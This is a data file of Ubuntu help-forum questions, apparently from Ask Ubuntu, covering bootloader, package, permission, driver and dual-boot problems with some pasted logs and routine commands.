365421	right place to install ubuntu bootloader	i installed ubuntu on a windows machine , but after restart the computer automatically booted windows without showing me boot option . i think i might have installed my ubuntu bootloader in the wrong partition . i previously have sda1,2,3,5 and 6 . i partitioned sda6 into sda6 , sda7 and sda8 . i mounted / on sda6 , swap on sda7 , /home on sda8 . when choosing where to install bootloader on the bottom , i selected sda6 , instead of sda , where my windows bootloader is . i wonder if i should choose that disk ? and now how can i repair it ? i used a usb to install it . i can lunch ubuntu directly from my usb , so i tried grub-install /dev/sda on the usb lunched version but it displays : cp : can not create regular file `/boot/grub/915resolution.mod ' : permission denied . do n't know what to do . btw , in which disk is my ubuntu kernel installed ? thanks a lot .
365422	having problem installing xampp on ubuntu 12.41 lts	i followed the following commands to install lampp on ubuntu 12.04 lts cd desktop sudo -s tar xvfz xampp-linux-1.7.3a.tar.gz -c /opt sudo chmod 777 -r /opt/lampp/htdocs/ but i got stuck in this step : the error is chmod : can not access `/opt/lampp/htdocs/ ' : no such file or directory while i have made it ... .. how to solve this problem ? ? ?
365425	top clock panel in ubuntu	i am using ubuntu with cairo-dock without unity , but i want top clock-panel , how i can install it in my desktop ?
365426	problem when trying to execute a file	i am trying to execute or run a file in ubuntu , by using ./filename on the command line . when i try and run it , i get this error : error : a mode argument is required there is no file extension on the file . the file is called oracle and as far as i know , there should n't be a problem with the file . how do i fix the error and run the file ?
365433	what is the password if we put blank in type password , retype password coln in the option of password change ?	i have installed ubuntu 12.04 , encrypting home folder.later i wanted to remove password.earlier i used windows os.there was an option for without password in windows . in ubuntu , while resetting password , i put nothing in the type password , retype password and i pressed enter key.after reboot ubuntu is asking password.i put my earlier password , without punnting any letter , just pressed enter and i tried all other options to login.but ubuntu says wrong password . what should i do to open my system ?
365435	what program should i load the ubuntu download file with if i want it on a cd for my new desktop	i am wanting to download ubuntu onto a cd so when i load up my new computer i have an operating system on it how can i do this and what do i load the file with after the download .
365436	trouble with immediate shutdown in ubuntu 13.10 with cinnamon	just installed ubuntu on my family 's computer . i thought the cinnamon desktop environment would be better for my parents who have only ever used windows . everything works great until i try to shut down . shutting down while in cinnamon desktop brings up a prompt window that says it will shutdown in 60 seconds and gives the option to either suspend or cancel . the suspend button does not suspend the computer . allowing the timer to countdown merely logs the current user out . under power management , i have selected shutdown immediately for power button action . i still get the same prompt . i have tried toggling between the other options , but regardless of what option is selected , the shutdown button always brings up the suspend or cancel prompt with no way to shutdown immediately . i would prefer not to use the power button for this as it is partially concealed with the computer desk . the fastest way to shutdown is to log out ( which says it will log out in 60 seconds but also has log out and cancel buttons , so i can immediately log out ) and then shutdown . i would prefer to have it automatically shut down . any and all suggestions are appreciated . thank you ! update : i also can not suspend using the button to lock screen . this particular keyboard has a dedicated button for it , and the button works just fine ...
365437	account on ubuntu touch	how to change from the guest mode to regular account mode.since i skipped the register process in the first use of ubuntu touch on my nexus 10 , i can not find any way to create an account in this system . in guest mode , terminal is not working , so i ca n't use command to change my account level like the way in pc.anyone can help ?
365438	installing on a new hard drive	how do i install ubuntu on a new drive with a downloaded version 13.10 on a dvd ? the file is a zip , do i unzip it the the dvd ? i have been able to install ubuntu on a pc with an os but having trouble with a new hard drive .
365441	13.10 suspend kills wifi connection	i tried to post to this thread hardware wireless switch has no effect after suspend and 13.10 upgrade for if i understand their question i am having the same problem , but the answer option wo n't work for . after suspend , the wireless is disconnected and the only way to get it to reinitialize/be recognized is to do a full restart . at first i thought it was my gnome-shell ( for lock screen disappeared there with 13.10 ) , but when i switched to the default ubuntu it 's still doing it and it 's kinda driving me nuts for i have to reopen all my files and browsers/tabs/windows every time . i do n't know how to show the terminal stuff the above asker shows , but it sounds like the same issue and it only started with 13.10 upgrade a few days ago . any help would be much appreciated ! ! ! -- thanks so much , ser .
365446	ubuntu deleted from lightdm !	compiz messed up the other day and erased my status bar . this was not uncommon , but this time it wouldnt let me open up the terminial to fix it . after a long time , i found out how to uninstall compiz from recovery , and i did . i then proceded to run dpkg from recovery . i booted my computer up , and ubuntu is gone ! all i can boot up into is my gnome shell . how do i fix this ? ? ? ? is there a command to reinstall the ubuntu shell ? please help ! ! !
365447	apt-get update not working in ubuntu 12.10	well i am pretty new to linux more specifically ubuntu . i had been using this system with ubuntu 12.10 installed for about 1 month now . while sudo apt-get update used to work everyday , its been 3 days its not working at all . this is the error i get root @ cdot-hp-pro-3330-mt : ~ # apt-get update get:1 http : //dl.google.com stable release.gpg [ 198 b ] get:2 http : //archive.canonical.com ubuntu release.gpg [ 2,498 b ] get:3 http : //dl.google.com stable release [ 1,347 b ] get:4 http : //extras.ubuntu.com quantal release.gpg [ 72 b ] get:5 http : //archive.canonical.com precise release.gpg [ 2,500 b ] get:6 http : //archive.ubuntu.com quantal release.gpg [ 933 b ] get:7 http : //dl.google.com stable/main amd64 packages [ 1,222 b ] get:8 http : //extras.ubuntu.com quantal release [ 11.9 kb ] get:9 http : //dl.google.com stable/main i386 packages [ 1,200 b ] get:10 http : //archive.canonical.com ubuntu release [ 2,490 b ] ign http : //archive.canonical.com ubuntu release e : gpg error : http : //archive.canonical.com ubuntu release : the following signatures were invalid : nodata 1 nodata 2 i have already refered to error doing sudo apt-get update xubuntu 12.10 but the answer did n't help .
365448	how to add swap file to ubuntu 12.04	i have at ubuntu 12.04 swap size the same as my ram - 1gb . i want to increase this a little bit , till 3gb . increase 2gb of swap size . i read swapfaq but i ca n't understand how to keep having this swap capacity that i have and add additional space ? here you can see my disk structure with gparter : i hope someone can help me increase swap size .
365451	upgrade tries to install java although i have it installed	i tried installing java using the command line but for some reason it was really slow . so i downloaded java and installed it manually and now it is working properly . the problem is that whenever i run sudo apt-get upgrade or install anything using sudo apt-get install it tries to download and install java as well and it still is slow . does anybody know how i can fix this ?
365452	ubuntu 12.04 fails to start after installing ia32-libs	i was following the question and instruction in this post to run 32bit applications on my ubuntu 12.04. ia32-libs broken package ( ubuntu 12.04 x64 ) in particular , i did the followings : sudo apt-get install libgl1-mesa-dri : i386 sudo apt-get install ia32-libs-multiarch : i386 sudo apt-get install ia32-libs-multiarch sudo apt-get install ia32-libs the installation was successful and i was able to run 32bit apps ( downloaded directly , not installed from apt-get command ) . however , when i restart the machine , it did not work up , freeze at the logo . what should i do ? i guest the installation removes all the important components : ( thank you very much .
365453	how to make cdn server ubuntu system	i am searching for a software that can be use for setup cdn server on ubuntu system i also have tried squid cache but unable to setup it please anybody suggess me software that can be used for make cdn server on my ubuntu system
365454	apache2 error could not open configuration file /etc/apache2/conf.d/ : no such file or directory	i have just upgraded my ubuntu 13.10 and apache2 is not working . when i try to start the apache2 server it is printing following errors : * starting web server apache2 * the apache2 configtest failed . output of config test was : apache2 : syntax error on line 263 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/conf.d/ : no such file or directory action 'configtest ' failed .
365457	using trickle to limit the bandwidth of a virtualbox vm	i 'm trying to limit the bandwidth of a virtual machine running via virtualbox . trickle -d 5 virtualbox does n't work , i believe because of an issue with child processes ( trickle -d 5 sudo apt-get upgrade does n't work either ) how can i limit the download/upload bandwidth of virtualbox 's vms ?
365460	why are the textbased consoles ( as normally available from alt+f1 upto alt+f6 ) unavailable when the nvidia driver has an issue ?	i have already had a lot of issues with the proprietary nvidia drivers ( most often after upgrade of the driver or the kernel ) , they are very cumbersome to resolve , especially because most of the time when there is an issue after the install of the proprietary driver , the one suggested by ubuntu . the text-based consoles are not accessible either . on a desktop , openssh-server is not installed by default so it becomes again more cumbersome to troubleshoot . when openssh-server was installed , it was however often possible to connect to the machine remotely by ssh , but not the textbased consoles as expected on alt+f1 upto alt+f6 . why are those not available when there is an issue with these nvidia drivers ?
365461	server install from 1 gig usb	how can i install the ubuntu cd iso image on to a 1 gig thumb drive so that it can boot to my target system ? thanks
365466	how i can send bug report if lubuntu does n't start ?	i found a bug when disk is full - lubuntu 13.10 ca n't load . i went to ubuntu page on launchpad to search this `` bug '' but did n't find this `` bug '' . i push button `` report a bug '' , but i see this help wiki page , not the interface of `` bug '' submitting . maybe i need to do something to get access of posting `` bug reports '' ?
365467	outlook 2010 on ubuntu13.04	i have installed microsoft office on my laptop running on xubuntu 13.04 . i installed it with playonlinux everything works except the outlook . outlook opens and i can play around on it , but as soon as click the send and receive button a wine program error pops up with the following : '' the program outlook.exe has encountered a serious problem and needs to close . '' and then `` this can be caused by a problem in the program or a deficiency in wine . if there is someone with a solution i will be clad to hear about it ! thanks !
365471	i have a problem with running the application from steam ( dont starve )	graphics - ati radeon 6400m cpu - core i5 translation with google : when i start a game its window opens and closes immediately with no errors or warnings . i tried to switch to the closed drivers ( now free ) but had to reinstall due to `` missing interface '' . i have n't been using linux for a long time . original у меня есть проблема с запуском приложения из steam ( do n't starve ) когда запускаю игру окно открывается и мнгновенно закрывается , ни ошибок ни предупреждений , попробовал переключится на закрытые драйвара ( сейчас свободные ) пропал интерфейс пришлось переустанавливать . я не давно пользуюсь линуксами , помогите решить проблему .
365473	how to fix faint printouts on samsung clp-610 on 12.04	i have a samsung clp-610 printer . when i print a google map , the colors are faint to the point that it is almost useless . if i use windows 7 or a mac or an older fedora 10 box to print the same file , the colors are good and the map legible . i am using the samsung clp-610 series [ en ] driver . i have tried the samsung clp-610 foomatic/foo2qpdl driver , but the output is monochromatic . ( i have tried lots of other stuff , but am getting desperate . )
365476	how to intall ubuntu and remove windows on lenovo g500s	how to install ubuntu on lenovo g500s laptop with windows 8 os.i want to completely remove windows 8 and install ubuntu.please tell me how to install.please tell me complete steps
365478	use of 30gb installation	please tell me the difference between 18 and 30 gb wubi installation . do i get all packages installed in 30gb wubi installation ?
365480	write permissions in /var/www folder	i followed the steps from http : //askubuntu.com/a/51337/115811 to add my user to a www-data group and set the /var/www/ dir group writeable . sudo adduser < username > www-data sudo chown -r www-data : www-data /var/www sudo chmod -r g+rw /var/www this is /var/www/ contents : drwxrwsr-x 2 www-data www-data 4096 oct 25 08:13 ./ drwxr-xr-x 14 root root 4096 oct 17 08:47 ../ -rwxrwsr-x 1 www-data www-data 177 oct 17 23:51 index.html* however when i try to git clone or mkdir in /var/www/ , i am still getting `` permission denied '' . what am i missing ?
365481	can not upgrade from 11.10 for my samsung x05 laptop	installed ubuntu 11.10 desktop , my samsung x05 laptop work perfectly now . but while what to upgrade to 12.4 lts or 13 , it tell me that my features not supported by the cpu , and can not install . does anything can do so as to upgrade ? thanks .
365483	after installing thunar and removing nautilus lost my desktop icons and files	i have installed thunar instead of nautlius . and now i have nothing on my desktop after reboot . how to solve this problem ? i have checked gnome-tweak-tool and `` have file manager handle destop '' is on . please help . but they exist in desktop folder
365485	audio input to audio output	my audio output is broken , but i also have an audio input which i dont need , is there any chance that i could change them so the input will be the output ? nice greeting maria ps : sorry for my bad english , i 'm from germany ; )
365487	print options in applications overrides printer options	i have a problem , that i first experienced at epson xp-33 and epson xp-207 , but it proved to be common for other printers as well . i print different pages in different sizes ( small photos , large photos , color print , b/w text ) . in windows i did it by creating a copies of my printer in the system , setting separate print options for each printer for each print format . it worked fine - you choose a printer , it prints what and how you want it . but when i try that in ubuntu 12.04 it turns out that the applications do not care about the the options of the printers . they keep their own settings . moreover they do not just keep their own options , but somehow it 'spreads ' to other printers . e.g . i send a colored a4 to print in evince but it prints it in b/w , as b/w was the last print option . if you choose the other printer the options from last print task are already there , though i expect them to print with the option predefined on a printer . what would be the cause and the way out of it ?
365489	grub is booting old image instead of new	i have this problem : i upgraded my system from 12.04- > 12.10- > 13.04- > 13.10 ... everything is actually working fine . i just have one problem : grub 2 is still loading a old linux image : ~ # uname -r 3.2.0-53-generic these images are installed ~ # dpkg -- list | grep linux-image ii linux-image 3.11.0.12.13 amd64 generic linux kernel image . ii linux-image-3.11.0-12-generic 3.11.0-12.19 amd64 linux kernel image for version 3.11.0 on 64 bit x86 smp ii linux-image-3.2.0-53-generic 3.2.0-53.81 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-extra-3.11.0-12-generic 3.11.0-12.19 amd64 linux kernel extra modules for version 3.11.0 on 64 bit x86 smp ii linux-image-generic 3.11.0.12.13 amd64 generic linux kernel image the menuentries in grub.cfg ~ # cat /boot/grub/grub.cfg | grep `` menuentry ' '' menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-eaf519ef-499e-4269-adeb-97827ecf156e ' { menuentry 'ubuntu , with linux 3.11.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic- advanced-eaf519ef-499e-4269-adeb-97827ecf156e ' { menuentry 'ubuntu , with linux 3.11.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12- generic-recovery-eaf519ef-499e-4269-adeb-97827ecf156e ' { menuentry 'ubuntu , with linux 3.2.0-53-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.2.0-53-generic-advanced- eaf519ef-499e-4269-adeb-97827ecf156e ' { menuentry 'ubuntu , with linux 3.2.0-53-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.2.0-53- generic-recovery-eaf519ef-499e-4269-adeb-97827ecf156e ' { menuentry 'memory test ( memtest86+ ) ' { menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { default is pointing to 0 ~ # cat /boot/grub/grub.cfg | grep default= set default= '' 0 '' any ideas ? seems that grub is falling back to the old image , as there is problem with newest one . any way to get a logging from grub . the machine is a remote server without a serial console . thanks in advance . best regards , jens
365490	which input schemes are shown in text entry ?	text entry does n't show all the schemes installed in /usr/share/m17n/ for example , i have sa-harvard-kyoto input . but that is not shown in text entry options . does text entry have a different folder for languages shown ? if yes , what is it ? os : ubuntu 13.10
365493	ubuntu linux 13.04 kernel panic	my problem is kernel panic when ubuntu linux 13.04 is loading . can anybody understand log file content and explain me the reason of this problem ? my other operation systems such as windows and linux mint ca n't boot too . i suppose that problem is hardware damage . but what kind of damage has happened ? thanks in advance . log file : http : //postimg.org/image/9ivbcfidt/
365494	upgrade from 12.04 to 13.10	do i need to download drivers before i upgrade to 13.10 ? i have asus x201e , but can not find the drivers on the asus website .
365495	how to enable mouse wheel scroll of tabs in gedit ?	in gedit , one used to be able to use the mouse wheel to scroll through all the tabs opened . now the function is gone . ( mouse wheel working very fine , scroll through tabs still working on earlier versions ) . any one knows how to enable , restore or install this very convenient feature ?
365501	my thunderbird calendar contents have disappeared . how can i restore them ?	the contents of the calendar have all disappeared , the titles are still there but no information is present . how can i get it back or is it lost for ever ?
365504	can i install ubuntu 13.10 without the internet ?	i 'm new to ubuntu and linux in general . i 'm currently out of town and the dorm i am living in has terrible internet connection . it wo n't be another 2-3 weeks before i can go home and have proper internet connection . so my question is whether or not i can install ubuntu 13.10 in my laptop without the internet and then do the updates once i go home ? also , i 'm attempting to do a dual boot with my lenovo g505s which was pre-installed with windows 8 . hopefully i can pull this off . i already did the necessary things ( i think and hope so ) prior to installation : disable secure boot enable legacy and boot uefi first create partition put installer in my pen drive as i am quite new to this , any advice would be of great help . thanks in advance ! edit : i tried yesterday . the installation asked me to connect to the internet , so i used my crappy dorm internet . when it reached the downloading/installtion of ubuntu one , it just stopped and went on forever . so i had to stop it .
365507	how to install curl 13.04 with depency error	how to install curl in ubuntu 13.04 ? it always throw this error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : curl : depends : libcurl3 ( = 7.29.0-1ubuntu3 ) but 7.29.0-1ubuntu3.2 is to be installed e : unable to correct problems , you have held broken packages . when using sudo apt-get update , it shows : 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . here are the steps i had done : using sudo apt-get install curl removing google-chrome-stable and chromium browser then sudo apt-get install curl use sudo apt-get autoremove & & sudo apt-get autoclean & & sudo apt-get clean then run the 1st step again . also i have tried : how do i resolve unmet dependencies ? and still throw the same error . at this point i dont know what i did wrong , is curl impossible to install in ubuntu ?
365510	usb mouse/keyboard does n't work with 3.11.0-12-generic kernel	i ca n't use my usb keyboard/mouse after upgrade from raring to saucy . the keyboard works in grub menu and if i boot with the previous kernel version ( 3.8.0-31-generic ) . my new kernel version is 3.11.0-12-generic . i 've got mad catz r.a.t.7 wired usb mouse , canyon cnl-mbmso02 wired usb mouse and logitech dinovo edge wireless keyboard , connected to computer through logitech unifying receiver . using ps/2 keyboard i 've managed to get some information . dmesg says : [ 0.166273 ] acpi : bus type usb registered [ 0.166273 ] usbcore : registered new interface driver usbfs [ 0.166273 ] usbcore : registered new interface driver hub [ 0.166273 ] usbcore : registered new device driver usb ... [ 3.534226 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 3.534228 ] ehci-pci : ehci pci platform driver [ 3.534291 ] ehci-pci 0000:00:1a.7 : setting latency timer to 64 [ 3.534299 ] ehci-pci 0000:00:1a.7 : ehci host controller [ 3.534304 ] ehci-pci 0000:00:1a.7 : new usb bus registered , assigned bus number 1 [ 3.534315 ] ehci-pci 0000:00:1a.7 : debug port 1 [ 3.538218 ] ehci-pci 0000:00:1a.7 : cache line size of 64 is not supported [ 3.538231 ] ehci-pci 0000:00:1a.7 : irq 18 , io mem 0xd3325400 [ 3.548017 ] ehci-pci 0000:00:1a.7 : usb 2.0 started , ehci 1.00 [ 3.548042 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 3.548045 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.548048 ] usb usb1 : product : ehci host controller [ 3.548050 ] usb usb1 : manufacturer : linux 3.11.0-12-generic ehci_hcd [ 3.548053 ] usb usb1 : serialnumber : 0000:00:1a.7 [ 3.548155 ] hub 1-0:1.0 : usb hub found [ 3.548159 ] hub 1-0:1.0 : 6 ports detected [ 3.548311 ] ehci-pci 0000:00:1d.7 : setting latency timer to 64 [ 3.548319 ] ehci-pci 0000:00:1d.7 : ehci host controller [ 3.548323 ] ehci-pci 0000:00:1d.7 : new usb bus registered , assigned bus number 2 [ 3.548333 ] ehci-pci 0000:00:1d.7 : debug port 1 [ 3.552228 ] ehci-pci 0000:00:1d.7 : cache line size of 64 is not supported [ 3.552239 ] ehci-pci 0000:00:1d.7 : irq 23 , io mem 0xd3325000 [ 3.564014 ] ehci-pci 0000:00:1d.7 : usb 2.0 started , ehci 1.00 [ 3.564044 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 3.564047 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.564050 ] usb usb2 : product : ehci host controller [ 3.564052 ] usb usb2 : manufacturer : linux 3.11.0-12-generic ehci_hcd [ 3.564056 ] usb usb2 : serialnumber : 0000:00:1d.7 [ 3.564163 ] hub 2-0:1.0 : usb hub found [ 3.564167 ] hub 2-0:1.0 : 6 ports detected [ 3.564274 ] ehci-platform : ehci generic platform driver [ 3.564280 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 3.564281 ] ohci-platform : ohci generic platform driver [ 3.564287 ] uhci_hcd : usb universal host controller interface driver [ 3.564345 ] uhci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 3.564347 ] uhci_hcd 0000:00:1a.0 : uhci host controller [ 3.564352 ] uhci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 3 [ 3.564378 ] uhci_hcd 0000:00:1a.0 : irq 16 , io base 0x0000f0c0 [ 3.564402 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0001 [ 3.564404 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.564406 ] usb usb3 : product : uhci host controller [ 3.564408 ] usb usb3 : manufacturer : linux 3.11.0-12-generic uhci_hcd [ 3.564410 ] usb usb3 : serialnumber : 0000:00:1a.0 [ 3.564478 ] hub 3-0:1.0 : usb hub found [ 3.564482 ] hub 3-0:1.0 : 2 ports detected [ 3.564589 ] uhci_hcd 0000:00:1a.1 : setting latency timer to 64 [ 3.564592 ] uhci_hcd 0000:00:1a.1 : uhci host controller [ 3.564597 ] uhci_hcd 0000:00:1a.1 : new usb bus registered , assigned bus number 4 [ 3.564623 ] uhci_hcd 0000:00:1a.1 : irq 21 , io base 0x0000f0a0 [ 3.564647 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0001 [ 3.564649 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.564651 ] usb usb4 : product : uhci host controller [ 3.564653 ] usb usb4 : manufacturer : linux 3.11.0-12-generic uhci_hcd [ 3.564654 ] usb usb4 : serialnumber : 0000:00:1a.1 [ 3.564727 ] hub 4-0:1.0 : usb hub found [ 3.564730 ] hub 4-0:1.0 : 2 ports detected [ 3.564834 ] uhci_hcd 0000:00:1a.2 : setting latency timer to 64 [ 3.564837 ] uhci_hcd 0000:00:1a.2 : uhci host controller [ 3.564843 ] uhci_hcd 0000:00:1a.2 : new usb bus registered , assigned bus number 5 [ 3.564863 ] uhci_hcd 0000:00:1a.2 : irq 18 , io base 0x0000f080 [ 3.564885 ] usb usb5 : new usb device found , idvendor=1d6b , idproduct=0001 [ 3.564887 ] usb usb5 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.564889 ] usb usb5 : product : uhci host controller [ 3.564891 ] usb usb5 : manufacturer : linux 3.11.0-12-generic uhci_hcd [ 3.564892 ] usb usb5 : serialnumber : 0000:00:1a.2 [ 3.564962 ] hub 5-0:1.0 : usb hub found [ 3.564966 ] hub 5-0:1.0 : 2 ports detected [ 3.565073 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 3.565076 ] uhci_hcd 0000:00:1d.0 : uhci host controller [ 3.565081 ] uhci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 6 [ 3.565101 ] uhci_hcd 0000:00:1d.0 : irq 23 , io base 0x0000f060 [ 3.565124 ] usb usb6 : new usb device found , idvendor=1d6b , idproduct=0001 [ 3.565127 ] usb usb6 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.565128 ] usb usb6 : product : uhci host controller [ 3.565130 ] usb usb6 : manufacturer : linux 3.11.0-12-generic uhci_hcd [ 3.565132 ] usb usb6 : serialnumber : 0000:00:1d.0 [ 3.565195 ] hub 6-0:1.0 : usb hub found [ 3.565198 ] hub 6-0:1.0 : 2 ports detected [ 3.565303 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 3.565306 ] uhci_hcd 0000:00:1d.1 : uhci host controller [ 3.565310 ] uhci_hcd 0000:00:1d.1 : new usb bus registered , assigned bus number 7 [ 3.565329 ] uhci_hcd 0000:00:1d.1 : irq 19 , io base 0x0000f040 [ 3.565352 ] usb usb7 : new usb device found , idvendor=1d6b , idproduct=0001 [ 3.565354 ] usb usb7 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.565356 ] usb usb7 : product : uhci host controller [ 3.565358 ] usb usb7 : manufacturer : linux 3.11.0-12-generic uhci_hcd [ 3.565359 ] usb usb7 : serialnumber : 0000:00:1d.1 [ 3.565424 ] hub 7-0:1.0 : usb hub found [ 3.565427 ] hub 7-0:1.0 : 2 ports detected [ 3.565534 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 3.565537 ] uhci_hcd 0000:00:1d.2 : uhci host controller [ 3.565541 ] uhci_hcd 0000:00:1d.2 : new usb bus registered , assigned bus number 8 [ 3.565560 ] uhci_hcd 0000:00:1d.2 : irq 18 , io base 0x0000f020 [ 3.565584 ] usb usb8 : new usb device found , idvendor=1d6b , idproduct=0001 [ 3.565587 ] usb usb8 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 3.565588 ] usb usb8 : product : uhci host controller [ 3.565590 ] usb usb8 : manufacturer : linux 3.11.0-12-generic uhci_hcd [ 3.565592 ] usb usb8 : serialnumber : 0000:00:1d.2 [ 3.565658 ] hub 8-0:1.0 : usb hub found [ 3.565661 ] hub 8-0:1.0 : 2 ports detected ... [ 4.120014 ] usb 2-3 : new high-speed usb device number 2 using ehci-pci ... [ 4.468908 ] usb 2-3 : new usb device found , idvendor=046d , idproduct=0825 [ 4.468912 ] usb 2-3 : new usb device strings : mfr=0 , product=0 , serialnumber=2 [ 4.468914 ] usb 2-3 : serialnumber : af582e10 ... [ 5.284019 ] usb 5-2 : new full-speed usb device number 2 using uhci_hcd [ 5.465903 ] usb 5-2 : new usb device found , idvendor=046d , idproduct=0b04 [ 5.465908 ] usb 5-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 5.465911 ] usb 5-2 : product : logitech bt mini-receiver [ 5.465914 ] usb 5-2 : manufacturer : logitech [ 5.468948 ] hub 5-2:1.0 : usb hub found [ 5.470898 ] hub 5-2:1.0 : 3 ports detected [ 5.476096 ] switched to clocksource tsc [ 5.712099 ] usb 7-2 : new full-speed usb device number 2 using uhci_hcd [ 5.896366 ] usb 7-2 : new usb device found , idvendor=046d , idproduct=c52b [ 5.896370 ] usb 7-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 5.896372 ] usb 7-2 : product : usb receiver [ 5.896374 ] usb 7-2 : manufacturer : logitech [ 6.140016 ] usb 8-1 : new full-speed usb device number 2 using uhci_hcd [ 6.324597 ] usb 8-1 : new usb device found , idvendor=0738 , idproduct=1708 [ 6.324603 ] usb 8-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 6.324605 ] usb 8-1 : product : mad catz r.a.t.7 mouse [ 6.324608 ] usb 8-1 : manufacturer : mad catz [ 6.564012 ] usb 8-2 : new low-speed usb device number 3 using uhci_hcd [ 6.746602 ] usb 8-2 : new usb device found , idvendor=1d57 , idproduct=0010 [ 6.746608 ] usb 8-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 6.746610 ] usb 8-2 : product : usb mouse with wheel [ 6.746613 ] usb 8-2 : manufacturer : hid-compliant mouse [ 7.337898 ] usb 5-2.2 : new full-speed usb device number 3 using uhci_hcd [ 7.490902 ] usb 5-2.2 : new usb device found , idvendor=046d , idproduct=c713 [ 7.490907 ] usb 5-2.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 7.490910 ] usb 5-2.2 : product : logitech bt mini-receiver [ 7.490913 ] usb 5-2.2 : manufacturer : logitech [ 7.490915 ] usb 5-2.2 : serialnumber : 001f203bd6a7 [ 7.569898 ] usb 5-2.3 : new full-speed usb device number 4 using uhci_hcd [ 7.722901 ] usb 5-2.3 : new usb device found , idvendor=046d , idproduct=c714 [ 7.722906 ] usb 5-2.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 7.722909 ] usb 5-2.3 : product : logitech bt mini-receiver [ 7.722911 ] usb 5-2.3 : manufacturer : logitech [ 7.722913 ] usb 5-2.3 : serialnumber : 001f203bd6a7 lsusb ( more output ) : bus 002 device 002 : id 046d:0825 logitech , inc. webcam c270 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 003 : id 1d57:0010 xenta bus 008 device 002 : id 0738:1708 mad catz , inc . bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 004 : id 046d : c714 logitech , inc. dinovo edge keyboard bus 005 device 003 : id 046d : c713 logitech , inc . bus 005 device 002 : id 046d:0b04 logitech , inc . bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub more background . before that i had a problem with logging in to gnome . during which i upgraded all the packages at one point ( apt-get upgrade ) and it stopped booting at all ( it did n't get to login screen ) . then i fixed path issue and now i 've got this usb-not-working issue . i tried reinstalling kernel , to no effect . is there anything else i can do to fix or diagnose the problem ?
365517	install ubuntu and remove windows 7	i 'm using windows 7 on my laptop ( 2gb ram , 250 gb hdd ) . i want to install ubuntu and remove windows 7 . i have partitioned my laptop into 2 partitions : , c drive - 105 gb and d drive - 145 gb . i want to install ubuntu on c drive all my data in d drive , no backup i have already selected the `` try something else option `` /dev/sdb /dev/sdb1 ntfs 104855 mb unknown c drive /dev/sdb5 ntfs 145192 mb unknown d drive i need help using the `` try something else '' option my course of action : laptop power on > > boot > > > > > > > > > ubuntu > > next > > something else > > partition .
365518	application to draw electrical instalations	are there any good linux applications for drawing electro fittings ? i have n't been able to find any ... usually these fittings are drawn in the autocad software .
365523	how to install ubuntu 13.10 on hybrid disk alongside windows 8.1	i am having trouble installing ubuntu 13.10 on hp envy 4-1046tx ultrabook . when i bought this , it came with windows 7 pre-installed , but i upgraded it to 8 and now recently to 8.1 . but somehow , i feel 8.1 is slower or something went wrong with the upgrade and made my system slow . i want to try dual booting ubuntu 13.10 with windows 8.1 the system recovery drive has windows 7 recovery files . ssd has 4gb allocated to windows 8 ( i think for hibernation/rapid start ) . 25gb of ssd is free and i want to install ubuntu on this ssd pointing it to `` / '' i will also shrink the windows partition ( the only other partition available apart from recovery & ssd ) to free up 100gb and allocate this space to `` /home '' during ubuntu installation . i tried the above steps while on windows 8 , but not successful . ubuntu installation went fine , but the grub was not loaded . i tried to deploy linux via easybcd , but after that also , selecting linux in the boot would load grub on command prompt and do nothing . while ubuntu installation , i also deleted the raid drivers with sudo dmraid -re , but still ubuntu didnt recognize my windows . i think i am missing some steps , so this time i want to do it right with proper info before starting the process . my requirements : dual boot ubuntu with windows 8.1 c : \ shrinked windows with 300gb on sda1 , 100gb for /home 